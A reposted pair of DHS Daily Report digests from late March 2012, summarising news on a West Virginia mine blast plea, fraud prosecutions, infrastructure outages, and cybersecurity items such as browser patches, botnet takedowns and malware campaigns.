Friday, March 30, 2012

Complete DHS Daily Report for March 30, 2012

Daily Report

Top Stories

• The former superintendent of a southern West Virginia mine where an explosion killed 29 workers pleaded guilty March 29 to a federal fraud charge. Prosecutors said he manipulated the mine ventilation system during inspections, and he disabled a methane monitor a few months before the fatal explosion. – Associated Press

1. March 29, Associated Press – (West Virginia) Ex-super pleads guilty in W.Va. mine blast case. The former superintendent of a southern West Virginia mine where an explosion killed 29 workers pleaded guilty March 29 to a federal fraud charge. The highest-ranking Massey Energy official charged in connection with the blast faces up to 5 years in prison when sentenced August 9. Prosecutors said the man manipulated the mine ventilation system during inspections to fool safety officials, and disabled a methane monitor on a cutting machine a few months before the explosion April 5, 2010. It was not clear from court papers whether the device was ever fixed. Prosecutors accused Massey of violating many safety laws out of a desire to put production and profits first. Three investigations concluded the firm allowed highly explosive methane and coal dust to build up inside the mine, where it was ignited by a spark from an improperly maintained piece of cutting equipment. Clogged and broken water sprayers then allowed what could have been just a flare-up to become an epic blast, the investigations found. Source:

• A special agent in charge of Homeland Security investigations warned counterfeit airbags were being sold in the Detroit market and could cause injuries in the event of deployment. – WDIV 4 Detroit

9. March 28, WDIV 4 Detroit – (Michigan) Homeland Security warns counterfeit airbags being sold in Metro Detroit. A special agent in charge of Homeland Security investigations in Michigan and Ohio warned that counterfeit airbags are being sold in the Detroit market and could cause injuries in the event of deployment. “The bag literally explodes, sending shrapnel and dangerous items into the passenger,” he said. Many of the faulty airbags can be bought online for a few hundred dollars, while a real airbag is priced closer to $1,000. The counterfeits either do not deflate when they need to, or they deflate or inflate with such force that the parts become projectiles. Source:

• The head of the National Security Agency and Cyber Command told a U.S. Senate panel that China stole a great deal of the U.S. military’s intellectual property from defense contractors. – CNET News (See item 10)

10. March 28, CNET News – (International) China nabbing ‘great deal’ of U.S. military secrets. Testifying before the U.S. Senate Armed Services Committee March 27, the head of the National Security Agency (NSA) and Cyber Command said China is stealing a “great deal” of the U.S. military’s intellectual property, adding that the NSA sees “thefts from defense industrial base companies.” He confirmed speculation that China was behind 2011’s attacks on RSA. Those attacks proved extremely troublesome for U.S. defense contractors. In 2011, Chinese hackers allegedly stole data related to RSA’s SecurID two-factor authentication devices. Soon after, that information was used to break through security safeguards at defense contractors Lockheed Martin, L-3 Communications, and Northrop Grumman. Source:

• Four U.S. Navy employees and three defense contractors pleaded guilty to a scheme that involved awarding millions of dollars in aircraft maintenance contracts in exchange for bribes. – Associated Press (See item 11)

11. March 28, Associated Press – (California) Navy employees, contractors plead guilty to fraud involving $1 million in bribes in Calif. Four U.S. Navy employees and three defense contractors working near San Diego pleaded guilty to participating in a wide-ranging corruption scheme in which the contractors won millions of dollars in military orders after offering officials massage chairs, bicycles, flat screen TVs, and other bribes, federal officials announced March 28. The civilian employees who worked for a Navy aircraft maintenance program accepted a total of more than $1 million in bribes, a U.S. attorney said. It was unclear if the scheme put national security or military operations at risk. An assistant U. S. attorney said the Navy employees worked for a program tasked with ensuring aircraft were combat ready at the Naval Air Station North Island in Coronado, near San Diego. The four Navy employees worked for the Navy’s Fleet Readiness Center and were assigned to maintaining the Navy’s Grumman E-2 Hawkeye, an early warning aircraft, and the C-2 Greyhound, a derivative of the E-2 that has a widened fuselage with a rear loading ramp. Officials said the Defense Department paid more than $5.5 million in connection with fraudulent invoices submitted by the three defense contractors. Source:

• Firefighters rescued two people who passed through an unlocked gate and scaled several fences to break into a pump house at a water treatment plant in Sacramento, California. – KOVR 13 Sacramento (See item 33)

33. March 28, KOVR 13 Sacramento – (California) Two rescued from pump house near Sac State. A man and a woman who broke into a pump house on the American River near the Sacramento State campus in Sacramento, California, were rescued by fire personnel March 27 and the man was arrested. Sacramento firefighters were dispatched to the pump house after two people became trapped inside after scaling several fences to access the five-story building connected to the Fairbairn Water Treatment Plant. The woman apparently fell into a suction pool inside the pump house and the man was unable to get her out. The woman was taken to a hospital after suffering from hypothermia, and a warrant request for trespassing was submitted for her arrest, according to police. Fire officials said the two appeared to be intoxicated. The water treatment plant has had several security upgrades because water treatment facilities were classified as potential terrorist targets after the September 11th attacks. Firefighters said they walked in through an unlocked gate, but city officials would not say how they got inside and did not comment on security at the facility. Source:


Banking and Finance Sector

12. March 29, Empire State News – (New York) Stolen credit card information use to purchase $100,000 worth of E-ZPass tags. Charges were filed March 28 in New York against two defendants for engaging in a $6 million Internet-based credit card fraud scheme. As part of their scheme, the defendants used stolen credit cards to purchase $100,000 worth of E-ZPass tags and credits, which they then re-sold. They also caused fraudulent charges to be made on stolen credit and debit cards and created a bogus Web site that lured customers into purchasing products that they never received. In total, the pair compromised more than 1,400 credit and debit cards, attempting to charge more than $6 million to these accounts. Both suspects were arrested March 28 at their home in Brooklyn. Source:

13. March 29, Forest Hills Patch – (New York) Alleged Queens Blvd. bandit arrested. Police in the Queens borough of New York City have announced the arrest of a suspect wanted in connection with five bank robberies, three of which happened on Queens Boulevard, the Forest Hills Patch reported March 29. The suspect was arrested and charged with five counts of robbery for his alleged role in a February crime spree that struck four Chase Bank branches and one Capital One Bank. Police have been seeking a suspect since the first incident February 3. Every incident was similar, with the suspect handing a note to the teller then fleeing, with or without cash. Source:

14. March 28, U.S. Department of the Treasury – (International) Treasury announces additional sanctions against Iranian engineering and shipping firms. The U.S. Department of the Treasury announced March 28 additional sanctions against two entities connected to the network of the Islamic Revolutionary Guard Corps (IRGC) and two individuals and two entities affiliated with Iran’s national maritime carrier, the Islamic Republic of Iran Shipping Lines (IRISL). Pursuant to Executive Order 13382 Treasury designated several entities. The order is aimed at freezing the assets of proliferators of weapons of mass destruction and their supporters and thereby isolating them from U.S. financial and commercial systems. Entities designated by Treasury include: Iran Maritime Industrial Company SADRA (SADRA), an entity owned by the IRGC; Deep Offshore Technology PJS, a subsidiary of SADRA; Malship Shipping Agency Ltd., an IRISL affiliate; and Modality Limited, an IRISL affiliate. Source:

15. March 28, West Hawaii Today – (Hawaii) HCFCU admits member information breached. Hawaii Community Federal Credit Union employees improperly accessed the names, addresses, and last four digits of Social Security numbers (SSNs) of “several hundred” Hawaii Community Federal Credit Union members, the credit union’s president said March 27. The data breach happened nearly a year ago. The credit union did not notify members until the week of March 26, while an attorney conducted an investigation, the president said. The credit union posted a letter on its Web site March 23, and mailed it to credit union members late the week of March 19, informing them of the data breach, which the president said happened in April 2011. The credit union has about 40,000 members. Fewer than 500 had their account information accessed, the president said. He said account information and full SSNs were not accessed. A credit union member filed a complaint in 2011 after becoming suspicious. The president said a “handful” of employees were involved in the breach. Disciplinary actions were “up to and including termination,” he added. Information from the investigation has been forwarded to federal authorities, he said. Credit union employees will go through new training to reinforce policies that bar accessing member data. Officials are also reviewing policies and procedures, the president said. Credit union employees will also be able to anonymously report suspicions they have about co-workers who may be improperly accessing information via a new Web site, he added. Source:

16. March 28, U.S. Department of Justice – (National) Justice Department sues national tax preparation firm and franchisees to stop alleged pervasive tax fraud. The United States has filed civil injunction lawsuits in five cities seeking to shut down both the company that operates Instant Tax Service (ITS) as well as five owners of ITS franchises, the Justice Department (DOJ) announced March 28. The government’s complaint accuses ITS Financial and its owner of deliberately ignoring systemic and pervasive fraud by ITS franchisees. The complaints allege franchisees across the country intentionally prepare and file fraudulent tax returns to maximize refunds. They do this so ITS Financial and its franchisees can extract large tax preparation fees and charges. The government claims the fees are outrageously high and are often not disclosed. The franchisees named in the complaints allegedly invent phony businesses, fabricate deductions, falsify filing statuses, claim bogus dependents, and disregard rules for claiming the earned income tax credit. The DOJ alleges ITS employees at these franchises have little tax preparation experience, and that the franchise owners encourage them to prepare fraudulent tax returns. The complaint against ITS Financial states that the estimated tax losses from allegedly fraudulent return preparation in 2011 at ITS locations in St. Louis, the Kansas City area, Chicago, Indianapolis, and Las Vegas exceed $16 million. Source:

17. March 28, U.S. Department of Justice – (Texas) Justice Department seeks to shut down Texas tax return preparer. The United States has sued a tax preparer, seeking to bar him from preparing any federal tax returns for others, the Justice Department announced March 28. The civil injunction suit alleges the DeSoto, Texas man claimed fraudulent deductions and expenses on his customers’ tax returns. He allegedly claimed fake mortgage interest deductions, illegally deducted Social Security taxes as state and local taxes, and fabricated employee business expenses, among other fraudulent items, on his customers’ returns. According to the complaint, the harm to the United States from the preparer’s misconduct could be $7.8 million or more. Source:

18. March 28, Fort Worth Star-Telegram – (Texas) Ex-Bank of America branch manager pleads guilty to fraud. A former Bank of America branch manager in River Oaks, Texas, accused of stealing more than $2 million from customers’ accounts over a 9-year period pleaded guilty March 28 in federal court to one count of bank fraud. She faces anywhere from probation to 30 years in prison and could be ordered to pay a $1 million fine and restitution. Prosecutors allege the former manager used the money she stole for personal expenses, including vacations, clothing, jewelry, and land purchases. According to court documents, the woman was hired at the River Oaks branch in 1996, and was later promoted to personal banker, then assistant branch manager and finally branch bank manager. Her positions gave her full access to customers’ bank accounts. Beginning around 2002 until April 2011, she withdrew cash from customers’ bank accounts, sometimes forging signatures on withdrawal slips. She would inform tellers that she was withdrawing cash for the customer, sometimes lying by saying the customer was waiting inside her office. Prosecutors said she avoided having to fill out mandatory bank reports by never withdrawing more than $10,000 per transaction. She targeted customers with whom she had had a longstanding relationship, knowing they would likely report any uncovered improper transactions directly to her. She would then refund their accounts with money stolen from other customers’ accounts. Court documents state she prevented bank statements from being sent to customers’ home by entering codes into the bank’s data system indicating the customers’ addresses were unknown. Source:

19. March 28, Portland Oregonian – (Michigan; National) Portland man ordered to pay back profits from fraudulent investment schemes. A man has been ordered to return profits made from activities that resulted in a series of securities law violations, including his role in a Ponzi scheme that raised $72.6 million from 3,000 investors, the Portland Oregonian reported March 28. A federal judge in Michigan ordered the man to repay investors $4.1 million and to pay a $100,000 civil fine. According to the U.S. Securities and Exchange Commission (SEC), the man had promoted himself on his Web site,, as a trustworthy investment reviewer since 1997. He recommended some business opportunities, did not recommend others, and warned visitors how to spot and avoid a scam. Starting in 2006, the SEC alleged he promoted a series of fraudulent schemes, including the Ponzi scheme orchestrated by a Swartz Creek, Michigan man, who paid the defendant $3.8 million for his participation. He promoted other schemes and guaranteed large returns, but had no basis for the claim, the SEC said. Source:

20. March 27, Federal Bureau of Investigation – (National) FBI releases bank crime statistics for third quarter of 2011. During the third quarter of 2011, there were 1,094 reported violations of the Federal Bank Robbery and Incidental Crimes Statue, a decrease from the 1,325 reported violations in the same quarter of 2010, according to statistics released March 27 by the FBI. There were 1,081 robberies, 11 burglaries, 2 larcenies, and 1 extortion of a financial institution reported between July 1, 2011 and September 30, 2011. These statistics were recorded as of October 28, 2011. Source:

Information Technology

40. March 29, H Security – (International) Chrome 18 improves graphics performance, closes security holes. Google released version 18 of Chrome. The new Stable channel release, labelled 18.0.1025.142, closes nine security holes, of which three are rated as “High severity.” These include high-risk use-after-free errors in SVG clipping, an off-by-one problem in OpenType Sanitizer, and memory corruption bugs in Skia. Other closed holes include five medium-severity problems such as out-of-bounds reads in SVG text and text fragment handling, a cross-site scripting bug, a SPDY proxy certificate checking error, and an invalid read in the V8 JavaScript engine. A low-severity bug used by the hacker “Pinkie Pie” during the Pwn2Own competition at CanSecWest was also closed. A Google employee said some of the fixes “represent the start of hardening measures based on study of the exploits submitted to the Pwnium competition.” Source:

41. March 29, The Register – (International) Kelihos zombies erupt from mass graves after botnet massacre. Security researchers warned that the resurrected Kelihos botnet taken down March 28 is still active. Experts not involved in the operation said the miscreants behind the network of compromised Windows computers are working on their comeback. The zombie PC army was taken offline in September 2011, they said, yet later resurfaced. Seculert reports Kelihos-B, which was distributed as a Facebook worm over recent weeks, is still active and spreading — even after the shutdown attempt by CrowdStrike and Kaspersky Labs March 28. Seculert views this botnet as the undead remnants of Kelihos-B rather than the spawn of a new variant of the malware. The findings suggest sink-holing 109,000 backdoored machines infected with the spam-spewing and credential-stealing Kelihos trojan may not have disabled the entire bot network. Source:

42. March 28, eWeek – (International) iPhone passcodes can be cracked as quickly as XRY. The four-digit password on Apple’s iPhone is no match for Micro Systemation’s XRY application, according to experts. The password on the popular smartphone can probably keep a regular person who finds the device from breaking into it. However, the software from the Swedish company, which it sells to law enforcement agencies, can crack the code on an iPhone or a smartphone running Google’s Android mobile operating system within minutes. XRY essentially jailbreaks the device in the same manner that regular jailbreakers do. It then runs every combination of four-digit passcodes until it hits the right one. Once that happens, all the data on the phone can be accessed, according to the company. Source:

43. March 28, SecurityWeek – (International) Attackers using Taidoor trojan to target think tanks and US-Taiwan interests. In 2008, the Taidoor trojan made its first appearance on the Web. It started by attacking government agencies, but the group behind it expanded their reach by targeting a wide range of victims. Now, based on research from Symantec, it appears the group running Taidoor is interested in think tanks, especially those tfocused on Taiwan. While Taidoor started out by targeting governments, between 2009 and 2010, the malware shifted gears. Government victims were counted among those in the media, financial, telecom, and manufacturing sectors. The length of the attack, almost 4 years now, shows the group responsible for Taidoor is persistent if nothing else. Based on the collected data, Symantec said that since May 2011, there has been a substantial increase in activity. The malware’s current targets are primarily private industry and international think tanks with a direct involvement in United States and Taiwanese affairs. Facilities in the services sector these organizations may use are also targeted. Source:

44. March 28, Dark Reading – (International) Cybercriminals’ love affair with Havij spells SQL injection trouble. Today’s exponential increase in attack volume and complexity can largely be attributed to cybercriminal working smarter with powerful, automated tools. In the database-cracking world, Havij stands as one of the most popular of these tools: and as such, it should be on the radar of any security professional seeking to prevent costly data breaches within their environments. “If you’re talking about databases and the tools that are used to perform SQL injection, Havij is one of the most common,” a senior security strategist at Imperva said. Havij was developed by Iranian hackers in the spring of 2010. The tool has so captured the hearts and minds of the black hat community, that groups like Anonymous frequently train on how to wreak havoc using it, said the chief technology officer at Application Security, Inc. Favored by hacktivists and financially motivated attackers, Havij automates criminals’ SQL injection attacks by automatically detecting the database behind a targeted Web site, detecting whether it uses a string or integer parameter type, and testing different injection syntaxes. Unlike a lot of penetration tools, Havij can not only point to potential vulnerabilities, it can also carry out data extraction and harvesting. Source:

45. March 28, Computerworld – (International) Duqu malware resurfaces after four-month holiday. Duqu is back, security researchers said March 28. After a several-month sabbatical, the Duqu makers recompiled one of the trojan’s components in late February, said the manager of operations at Symantec’s security response team. The system driver, which is installed by the malware’s dropper agent, is responsible for decrypting the rest of the already-downloaded package, then loading those pieces into the PC’s memory. Symantec captured a single sample of the driver, which was compiled February 23, 2012. Before that, the last time the Duqu gang updated the driver was October 17, 2011. Duqu has been characterized by Symantec and others as a possible precursor to the next Stuxnet, the ultra-sophisticated worm that sabotaged Iran’s nuclear fuel enrichment program by crippling critical gas centrifuges. The Symantec manager said the functionality of the new driver was “more or less the same” as earlier versions, including the one spotted October 2011 and another from late 2010 that later surfaced. March 27, the leader of Kaspersky’s global research and analysis team said the Duqu driver was probably modified to evade security software and Duqu detection programs. Source:

46. March 27, U.S. Federal Trade Commission – (International) FTC charges that security flaws in RockYou game site exposed 32 million email addresses and passwords. The operator of a social game site agreed to settle charges that, while touting its security features, it failed to protect the privacy of its users, allowing hackers to access the personal information of 32 million users. The Federal Trade Commission (FTC) also alleged in its complaint against RockYou that the company violated the Children’s Online Privacy Protection Act Rule (COPPA Rule) in collecting information from about 179,000 children. The proposed FTC settlement order with the company bars future deceptive claims by the company regarding privacy and data security, requires it to implement and maintain a data security program, bars future violations of the COPPA Rule, and requires it to pay a $250,000 civil penalty to settle the COPPA charges. Source:

For more stories, see items 10, above in Top Stories and 47 and 48 below in the Communications Sector

Communications Sector

47. March 28, CSO – (International) Operation Global Blackout: Real danger or irrelevant? Will the hacker group Anonymous make good on its threat to take down the Internet March 31? Probably not. But it could slow it down, according to many security experts. It may depend in part on how unified Anonymous is about the attack. Anonymous threatened retaliation for the arrests of about 25 of its members in February, and is also focused on what its members believe is a continuing threat by Congress to censor the Internet through anti-piracy legislation. Anonymous is daring anyone to stop Operation Global Blackout — the group announced March 31 as the date of the attack, along with the method they intend to use — disabling the Domain Name Service (DNS) through distributed denial of service attacks on the root servers of the DNS with a tool called “ramp,” or “reflective amplification.” Even with the advance warning, a professor in the department of computing at the University of Surrey believes Anonymous could do some damage. In a piece for BBC, he said the top-level DNS systems are in different countries, are monitored by different organizations, and run on different technologies. He said Anonymous could bring a server down with ramp, in which an army of bots spoof the IP address of a target system and, “cause the DNS to flood the very network it is supposed to be serving.” Source:

48. March 28, Biloxi Sun Herald – (Mississippi) Cut cable silences C Spire phone service. C Spire Wireless customers in south Mississippi lost service March 29 when a fiber-optic cable was cut. A C Spire Wireless spokesman said an independent third party was found to have cut an underground cable, between Seminary and Hattiesburg, resulting in a service outage sometime before noon. Shortly before 4 p.m., he said service had been restored to virtually 100 percent of customers. He could not estimate how many customers lost service. “The primary impact was voice service, although we have gotten some scattered reports from some customers (saying) that they also couldn’t text,” he said. Source:

For more stories, see items 42 and 46 above in the Information Technology Sector

Thursday, March 29, 2012

Complete DHS Daily Report for March 29, 2012

Daily Report

Top Stories

• The San Onofre nuclear plant near San Diego will remain shut down while investigators try to discover what is causing the rapid decay of generator tubing that carries radioactive water. – Associated Press

6. March 28, Associated Press – (California) Feds: State nuke plant to remain shut for probe. The San Onofre nuclear plant near San Diego will remain shut down while investigators try to solve a mystery inside its massive generators — the rapid decay of tubing that carries radioactive water, federal regulators said March 27. A four-page letter to plant operator Edison from the Nuclear Regulatory Commission regional administrator laid out a series of steps the company must take before restarting the seaside reactors, underscoring the concern over the unusual degradation in the tubes. The administrator wrote that the problems in the generators must be resolved and fixed and “until we are satisfied that has been done, the plant will not be permitted to restart.” The plant’s 4 steam generators each contain nearly 10,000 alloy tubes that carry hot, pressurized water from the reactors. The Unit 3 reactor was shut down as a precaution in January after a tube break, and extensive wear was found on similar tubing in its twin, Unit 2, which has been shut down for maintenance. Source: State nuke plant to remain shut for probe

• The Securities and Exchange Commission sued a former United Commercial Bank vice president, accusing him of creating false records that contributed to the bank’s failure. The collapse cost the federal government $2.5 billion. – Bloomberg See item 9 below in the Banking and Finance Sector.

• A section of railroad in northeastern Indiana that carries up to 100 trains per day was shut for a second day while crews contended with a chemical fire caused by a train derailment. – Fort Wayne Journal Gazette

14. March 28, Fort Wayne Journal Gazette – (Indiana) Derailment, fire prompt evacuation near Ligonier. Officials said a heavily traveled stretch of railroad in northeastern Indiana would likely be closed through March 28, a day after a freight train derailed and spewed molten sulfur that caught fire. Firefighters were still at the site near Ligonier March 28 monitoring the fire caused after 21 cars of the eastbound 59-car Norfolk Southern train derailed. The Noble County sheriff said firefighters decided to let the cars burn because water could wash the chemical into the Little Elkhart River. He said the fire was expected to burn until at least noon March 28. Up to 100 trains, including two Amtrak passenger trains, use the route daily, Norfolk Southern said. It said that trains that normally use the route have been rerouted with other carriers and alternate routes. The train that derailed had 3 locomotives, 43 cars loaded with freight, including 11 with hazardous materials such as molten sulfur and toluene, and 16 empty freight cars. The derailment forced detours of two Amtrak trains carrying about 400 passengers combined. It also forced the evacuation of about six homes in the rural area. Source:

• For the second time in 6 months, researchers from Kaspersky Lab led an operation to take down the newest iteration of the Kelihos botnet. The bot is used to send spam, carry out distributed denial-of-service attacks, and steal online currency. – Threatpost See item 36 below in the Information Technology Sector.


Banking and Finance Sector

9. March 27, Bloomberg – (California; National) SEC sues former United Commercial Bank executive. The Securities and Exchange Commission (SEC) sued a former United Commercial Bank vice president (VP) March 27, accusing him of creating false records tied to the defunct San Francisco-based bank’s evaluation of loan risks. United Commercial, a unit of UCBH Holdings Inc., was seized by regulators in November 2009. It failed following the 2008 credit crisis and caused a $2.5 billion loss to the Federal Deposit Insurance Corporation’s insurance fund, according to the SEC. The VP was in charge of the bank’s commercial banking division, the SEC said. The VP, taking orders from his superiors during the financial crisis, “misstated and omitted material information in documents provided to the bank’s independent auditors,” the SEC said in its complaint. He “altered memoranda addressing the risks associated with certain large loans and the potential losses the bank faced from the loans,” which auditors relied on, according to the complaint. Three former executives at the bank were sued by the SEC in 2011 over claims they misled investors by concealing at least $65 million in loan losses before the lender collapsed. Source:

10. March 27, Burlington Free Press – (Connecticut; Vermont) Chiropractor pleads not guilty to $28 million investment fraud scheme. A Connecticut chiropractor was accused of being a silent partner, but prime beneficiary, in an alleged $28 million investment fraud scheme, the Burlington Free Press reported March 27. A renowned Vermont storyteller was a central fundraiser in the case. According to a federal indictment, the chiropractor induced the Vermont man to raise $28 million for for a still-unreleased film. The chiropractor, who was arrested in Connecticut the week of March 19, pleaded not guilty to an 18-count indictment March 27 in a U.S. district court in Burlington, Vermont. He is facing nine wire fraud counts, five mail fraud counts, three money laundering counts, and a single conspiracy count. Court documents allege that most of the investor money the Vermonter raised for the film went to pay off earlier investors. Some of the remainder went into the film project, but an estimated $3.8 million was diverted to the chiropractor. The Vermont man pleaded guilty the week of March 19 to conspiracy to commit wire fraud, and one count of filing a fraudulent tax document. He has agreed to cooperate with the government’s case. Source:

11. March 27, Manchester Union Leader – (New Hampshire) Prosecutors: NH mortgage scam stiffed homeowners. A man accused of running a mortgage scam that duped dozens of people into believing they were saving their homes while he pocketed loan proceeds that he never repaid was on trial March 27 in a U.S. district court in New Hampshire. According to an indictment, the man approached people who were struggling to make mortgage payments from 2005 to 2008. He would offer to take the deed to their property while allowing them to stay in the home. According to prosecutors, part of his scheme would have them pay rent while offering them an option to buy their homes back in 2 years. Instead, he leveraged the properties to take out more loans and would also use agents, or “straws,” who would pose as purchasers and take out mortgages to buy homes from the man’s companies. The loans, which totaled more than $13 million, were never repaid, prosecutors allege. The defendant paid associates and straws with the money, and pocketed much of it, spending it for personal expenses. “When [he] later defaulted on the mortgages and the homes went to foreclosure, the distressed homeowners were not notified because the straws were the owners of record,” the indictment alleged. Meanwhile, the defendant continued collecting rent payments from the homes’ former owners, the indictment said. Source:

For more stories, see items 36 and 39 below in the Information Technology Sector.

Information Technology

35. March 28, Threatpost – (International) Adobe patches Flash Player, unveils new silent updater. Adobe released a security update for its Flash Player March 28, patching two critical holes and introducing a new silent update option. The update, Adobe Flash Player 11.2, addresses two memory corruption vulnerabilities in Windows, Mac, Linux, and early Android builds that could lead to remote code execution according to a bulletin (APSB12-07). Users updating to 11.2 on Windows machines will notice a new background updater for Flash that has been shipped with the patch. After users update Flash, they will be asked how they want to receive Adobe updates going forward. The updater gives three options, including one that will automatically install updates in the background. If selected, the updater will check with Adobe every hour until it receives a response. If there is no available update, the updater will check back 24 hours later. Source:

36. March 28, Threatpost – (International) Kaspersky knocks down Kelihos botnet again, but expects return. For the second time in 6 months, researchers from Kaspersky Lab carried out an operation to take down the newest iteration of the Kelihos botnet, also known as “Hlux.” Microsoft and Kaspersky worked together in September, 2011, on the first Kelihos take-down. The bot then resurfaced in January only to be shut-down again in March by a combination of private firms including Kaspersky, Dell Secure Works, and Crowd Strike Inc. Kelihos is used to send spam, carry out distributed denial-of-service attacks, and steal online currency such as bitcoin wallets. It operates as a “peer-to-peer” bot network, which are more difficult to take down than those with centralized command and control (C&C) servers, according to a senior researcher at CrowdStrike. Peer-to-peer botnets are distributed, self-organizing, and may have multiple command and control servers that disguise themselves as peers. In Kelihos’s case, there were three C&C servers and each had two unique IP addresses, he said. Source:

37. March 28, H Security – (International) Opera 11.62 closes security holes. Opera released version 11.62 of its Web browser. This maintenance update fixes a number of bugs, improves overall stability, and closes seven security holes, five of which affect all supported platforms. Two of the vulnerabilities are rated as “high” severity and could be exploited by an attacker to download and execute a possibly malicious file. This is done by tricking a victim into clicking a hidden dialogue box or by entering a specific keyboard sequence. Three other problems rated as “low” severity, including an address-spoofing bug, an address-bar problem and a cross-domain information disclosure bug, were also fixed. A moderate vulnerability affecting Opera for Mac and a low risk bug on Linux/Unix were also corrected. Source:

38. March 28, H Security – (International) Critical Java hole being exploited on a large scale. Criminals are increasingly exploiting a critical hole in the Java Runtime Environment to infect computers with malicious code when users visit a specially crafted Web page. According to a security blogger, the reason for this increased activity is that the arsenal of the BlackHole exploit kit has been extended to include a suitable exploit. The hole patched by Oracle in mid-February allows malicious code to breach the Java sandbox and permanently anchor itself in a system. Varying types of malware are injected; for example, it is believed the hole is exploited to deploy the Zeus trojan. According to an analysis by Microsoft, the dropper is distributed across two Java classes. The first class exploits the vulnerability to elevate its privileges when processing arrays, and then executes a loader class that will download and install the payload. Users can protect themselves by installing or updating to one of the current Java releases: Java SE 6 Update 31 or version 7 Update 3. Source:

39. March 27, Threatpost – (International) Carberp: It’s not over yet. March 20, Russian law enforcement agencies announced the arrest of a cybercriminal gang involved in stealing money using the Carberp trojan. Evidently, those arrested were just one of the criminal gangs using the trojan. At the same time, those who developed Carberp are still at large, openly selling the trojan on cybercriminal forums. There are still numerous “affiliate programs” involved in the distribution of Carberp, particularly “traffbiz(dot)ru.” In short, those responsible for developing Carberp remain at large and the cybercriminal gangs using the trojan remain active. Source:

40. March 27, Dark Reading – (International) Malware to increasingly abuse DNS. Security researchers have looked at ways to abuse the domain-name service (DNS) for years. Now, some researchers are warning the protocol may increasingly be used to help criminals communicate with compromised systems. At the RSA Conference in February, a senior security consultant with InGuardians predicted more malware would hide its commands and exfiltrated data in DNS packets. The advantage for malware writers is that, even if a company bars a potentially infected computer from contacting the Internet, malware could send DNS requests to a local server, which would then act as a proxy, bypassing defenses. To date, the tactic has been relatively rare: Perhaps a dozen malware variants have used the domain-name system to send commands and updates to botnets. Source:

41. March 27, CNET News – (International) New exploit uses old Office vulnerability for OS X malware delivery. Some malware groups have recently been found to be taking advantage of an old, patched vulnerability in Microsoft Office for OS X in an attempt to spread command-and-control malware to OS X systems. The vulnerability used in the attack was outlined in a Microsoft security bulletin in June 2009, which applied to all versions of Office 2004 version 11.5.4 or earlier, Office 2008 version 12.1.8 or earlier, and OpenXML Converter 1.0.2 or earlier. The vulnerability was patched soon after it was found and currently all supported Office programs are well beyond these versions. However, malware developers are attempting to exploit unpatched systems. These efforts mark the first time Office documents have been used as a vehicle for attacks in OS X. For this attack to work, a person would need to open a maliciously crafted Word file that has likely been distributed via spam and other suspicious means that could easily be avoided. When a maliciously crafted Word file is opened in an unpatched version of Word for Mac, it runs a script that writes the document’s malware payload to the disk and executes a shell script that runs the malware. In addition, it displays a Word document containing a poorly formatted political statement about Tibetan freedoms and grievances. Source:

For another story, see item 42 below in the Communications Sector

Communications Sector

42. March 28, Taos News – (New Mexico) Gunshot blamed for Taos cell phone, Internet outage. A gunshot was identified as the cause of a cell phone and Internet outage that affected an estimated 7,800 residents in Taos, Questa, Penasco, Red River, Eagle Nest, Angel Fire, Cimarron, and Raton, New Mexico. The outage began just before 7 p.m. March 24. Service was restored by midday March 25. The loss of service was the result of a bullet that apparently cut an overhead fiber optic cable owned by CenturyLink. Several Internet providers and cell phone companies that serve Taos lease space on the same cable. E-mailed outage updates provided by the Public Regulation Commission showed CenturyLink reported that 7,774 residential, business, and government customers were impacted by the cut line. Outage updates from CenturyLink stated that mobile phone customers with Verizon, AT&T, and Sprint all went without service because of the break. Source:

For another story, see item 35 above in the Information Technology Sector